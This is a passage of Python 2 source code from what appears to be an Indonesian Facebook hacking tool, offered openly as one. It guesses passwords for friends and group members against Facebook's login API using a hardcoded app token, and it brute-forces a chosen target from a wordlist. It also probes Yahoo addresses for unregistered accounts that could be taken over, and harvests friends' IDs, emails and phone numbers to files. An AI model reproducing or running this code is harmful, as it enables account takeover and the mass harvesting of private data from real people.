buka.read().split() while file: username = file.readline().strip() url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6' data = urllib.urlopen(url) mpsh = json.load(data) if back == len(up): break if 'access_token' in mpsh: bisa = open('Berhasil.txt', 'w') bisa.write(username + ' | ' + passw + '\n') bisa.close() berhasil.append('\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw) back += 1 else: if 'www.facebook.com' in mpsh['error_msg']: cek = open('Cekpoint.txt', 'w') cek.write(username + ' | ' + passw + '\n') cek.close() cekpoint.append('\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw) back += 1 else: gagal.append(username) back += 1 sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint))) sys.stdout.flush() except IOError: print '\n\x1b[1;91m[!] Connection busy' time.sleep(1) except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' def hasil(): print print 52 * '\x1b[1;97m\xe2\x95\x90' for b in berhasil: print b for c in cekpoint: print c print print '\x1b[31m[x] Failed \x1b[1;97m--> ' + str(len(gagal)) keluar() def super(): global toket os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '║-> \x1b[1;37;40m1. Crack from Friends' print '║-> \x1b[1;37;40m2. Crack from Group' print '║-> \x1b[1;37;40m3. Crack from File' print '║-> \x1b[1;31;40m0. Kembali' print '\x1b[1;37;40m║' pilih_super() def pilih_super(): peak = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if peak == '': print '\x1b[1;91m[!] Can\'t empty' pilih_super() else: if peak == '1': os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id Teman \x1b[1;97m...') r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) z = json.loads(r.text) for s in z['data']: id.append(s['id']) else: if peak == '2': os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ') try: r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket) asw = json.loads(r.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name'] except KeyError: print '\x1b[1;91m[!] Group not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') super() re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket) s = json.loads(re.text) for i in s['data']: id.append(i['id']) else: if peak == '3': os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' try: idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m') for line in open(idlist,'r').readlines(): id.append(line.strip()) except IOError: print '\x1b[1;91m[!] File not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') super() else: if peak == '0': menu_hack() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada' pilih_super() print '\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m' + str(len(id)) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') titik = ['. ', '.. ', '... '] for o in titik: print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o, sys.stdout.flush() time.sleep(1) print print 52 * '\x1b[1;97m\xe2\x95\x90' def main(arg): user = arg try: a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket) b = json.loads(a.text) pass1 = b['first_name'] + '123' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass1 else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass1 else: pass2 = b['firs_name'] + '12345' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass2 else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass2 else: pass3 = b['last_name'] + '123' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass3 else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass3 else: lahir = b['birthday'] pass4 = lahir.replace('/', '') data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass4 else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass4 else: pass5 = ('sayang') data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass5 else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass5 else: pass6 = ('sayangku') data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass6 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass6 else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass6 except: pass p = ThreadPool(30) p.map(main, id) print '\n\x1b[1;91m[+] \x1b[1;97mFinish' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') super() def brute(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print '╔' + 52 * '\x1b[1;97m\xe2\x95\x90' try: email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ') passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m') total = open(passw, 'r') total = total.readlines() print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email print '\x1b[1;91m[+] \x1b[1;92mTotal\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword' jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') sandi = open(passw, 'r') for pw in sandi: try: pw = pw.replace('\n', '') sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mTry \x1b[1;97m' + pw) sys.stdout.flush() data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') mpsh = json.loads(data.text) if 'access_token' in mpsh: dapat = open('Brute.txt', 'w') dapat.write(email + ' | ' + pw + '\n') dapat.close() print '\n\x1b[1;91m[+] \x1b[1;92mFounded.' print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw keluar() else: if 'www.facebook.com' in mpsh['error_msg']: ceks = open('Brutecekpoint.txt', 'w') ceks.write(email + ' | ' + pw + '\n') ceks.close() print '\n\x1b[1;91m[+] \x1b[1;92mFounded.' print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint' print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw keluar() except requests.exceptions.ConnectionError: print '\x1b[1;91m[!] Connection Error' time.sleep(1) except IOError: print '\x1b[1;91m[!] File not found...' print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist' tanyaw() def tanyaw(): why = raw_input('\x1b[1;91m[?] \x1b[1;92mAre you sure want to make wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ') if why == '': print '\x1b[1;91m[!] Please choice \x1b[1;97m(y/t)' tanyaw() else: if why == 'y': wordlist() else: if why == 'Y': wordlist() else: if why == 't': menu_hack() else: if why == 'T': menu_hack() else: print '\x1b[1;91m[!] Please choice \x1b[1;97m(y/t)' tanyaw() def menu_yahoo(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '║-> \x1b[1;37;40m1. From Friends' print '║-> \x1b[1;37;40m2. From File' print '║-> \x1b[1;31;40m0. Back' print '\x1b[1;37;40m║' yahoo_pilih() def yahoo_pilih(): go = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if go == '': print '\x1b[1;91m[!] Can\'t empty' yahoo_pilih() else: if go == '1': yahoofriends() else: if go == '2': yahoolist() else: if go == '0': menu_hack() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mnot found' yahoo_pilih() def yahoofriends(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' mpsh = [] jml = 0 jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') friends = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) kimak = json.loads(friends.text) save = open('MailVuln.txt', 'w') print 52 * '\x1b[1;97m\xe2\x95\x90' for w in kimak['data']: jml += 1 mpsh.append(jml) id = w['id'] nama = w['name'] links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket) z = json.loads(links.text) try: mail = z['email'] yahoo = re.compile('@.*') otw = yahoo.search(mail).group() if 'yahoo.com' in otw: br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com') br._factory.is_html = True br.select_form(nr=0) br['username'] = mail klik = br.submit().read() jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*') try: pek = jok.search(klik).group() except: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]' continue if '"messages.ERROR_INVALID_USERNAME">' in pek: save.write(mail + '\n') print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + nama print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]' print 52 * '\x1b[1;97m\xe2\x95\x90' else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]' except KeyError: pass print '\n\x1b[1;91m[+] \x1b[1;97mFinish' print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt' save.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_yahoo() def yahoolist(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m') try: total = open(files, 'r') mail = total.readlines() except IOError: print '\x1b[1;91m[!] File not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_yahoo() mpsh = [] jml = 0 jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') save = open('MailVuln.txt', 'w') print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]' print mail = open(files, 'r').readlines() for pw in mail: mail = pw.replace('\n', '') jml += 1 mpsh.append(jml) yahoo = re.compile('@.*') otw = yahoo.search(mail).group() if 'yahoo.com' in otw: br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com') br._factory.is_html = True br.select_form(nr=0) br['username'] = mail klik = br.submit().read() jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*') try: pek = jok.search(klik).group() except: print '\x1b[1;91m ' + mail continue if '"messages.ERROR_INVALID_USERNAME">' in pek: save.write(mail + '\n') print '\x1b[1;92m ' + mail else: print '\x1b[1;91m ' + mail print '\n\x1b[1;91m[+] \x1b[1;97mFinish' print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt' save.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_yahoo() def grab(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '║-> \x1b[1;37;40m1. Get ID From Friends' print '║-> \x1b[1;37;40m2. Get Friends ID From Friends' print '║-> \x1b[1;37;40m3. Get ID From GRUP' print '║-> \x1b[1;37;40m4. Get Friends Email' print '║-> \x1b[1;37;40m5. Get Friends Email From Friends' print '║-> \x1b[1;37;40m6. Get Phone From Friends' print '║-> \x1b[1;37;40m7. Get Friend\'s Phone From Friends' print '║-> \x1b[1;31;40m0. Back' print '\x1b[1;37;40m║' grab_pilih() def grab_pilih(): cuih = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if cuih == '': print '\x1b[1;91m[!] Can\'t empty' grab_pilih() else: if cuih == '1': id_friends() else: if cuih == '2': idfrom_friends() else: if cuih == '3': id_member_grup() else: if cuih == '4': email() else: if cuih == '5': emailfrom_friends() else: if cuih == '6': nomor_hp() else: if cuih == '7': hpfrom_friends() else: if cuih == '0': menu_hack() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mnot found' grab_pilih() def id_friends(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) z = json.loads(r.text) save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') bz = open(save_id, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for ah in z['data']: idfriends.append(ah['id']) bz.write(ah['id'] + '\n') print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name'] print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id'] print 52 * '\x1b[1;97m\xe2\x95\x90' print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfriends) print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + save_id bz.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Error when creating file' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except KeyError: os.remove(save_id) print '\x1b[1;91m[!] An error occurred' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() def idfrom_friends(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m') try: jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket) op = json.loads(jok.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name'] except KeyError: print '\x1b[1;91m[!] Not be friends' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket) z = json.loads(r.text) save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') bz = open(save_idt, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for ah in z['friends']['data']: idfromfriends.append(ah['id']) bz.write(ah['id'] + '\n') print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name'] print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id'] print 52 * '\x1b[1;97m\xe2\x95\x90' print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfromfriends) print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + save_idt bz.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Error when creating file' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() def id_member_grup(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ') try: r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket) asw = json.loads(r.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name'] except KeyError: print '\x1b[1;91m[!] Group not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') b = open(simg, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket) s = json.loads(re.text) for i in s['data']: idmem.append(i['id']) b.write(i['id'] + '\n') print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + i['name'] print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id'] print 52 * '\x1b[1;97m\xe2\x95\x90' print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idmem) print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + simg b.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Error when creating file' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except KeyError: os.remove(simg) print '\x1b[1;91m[!] Group not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() def email(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) a = json.loads(r.text) mpsh = open(mails, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for i in a['data']: x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket) z = json.loads(x.text) try: em.append(z['email']) mpsh.write(z['email'] + '\n') print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name'] print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email'] print 52 * '\x1b[1;97m\xe2\x95\x90' except KeyError: pass print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(em) print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails mpsh.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Error when creating file' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except KeyError: os.remove(mails) print '\x1b[1;91m[!] An error occurred' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() def emailfrom_friends(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m') try: jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket) op = json.loads(jok.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name'] except KeyError: print '\x1b[1;91m[!] Not be friends' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket) a = json.loads(r.text) mpsh = open(mails, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for i in a['data']: x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket) z = json.loads(x.text) try: emfromfriends.append(z['email']) mpsh.write(z['email'] + '\n') print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name'] print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email'] print 52 * '\x1b[1;97m\xe2\x95\x90' except KeyError: pass print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(emfromfriends) print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails mpsh.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Error when creating file' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() def nomor_hp(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') url = 'https://graph.facebook.com/me/friends?access_token=' + toket r = requests.get(url) z = json.loads(r.text) no = open(noms, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for n in z['data']: x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket) z = json.loads(x.text) try: hp.append(z['mobile_phone']) no.write(z['mobile_phone'] + '\n') print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name'] print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone'] print 52 * '\x1b[1;97m\xe2\x95\x90' except KeyError: pass print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal 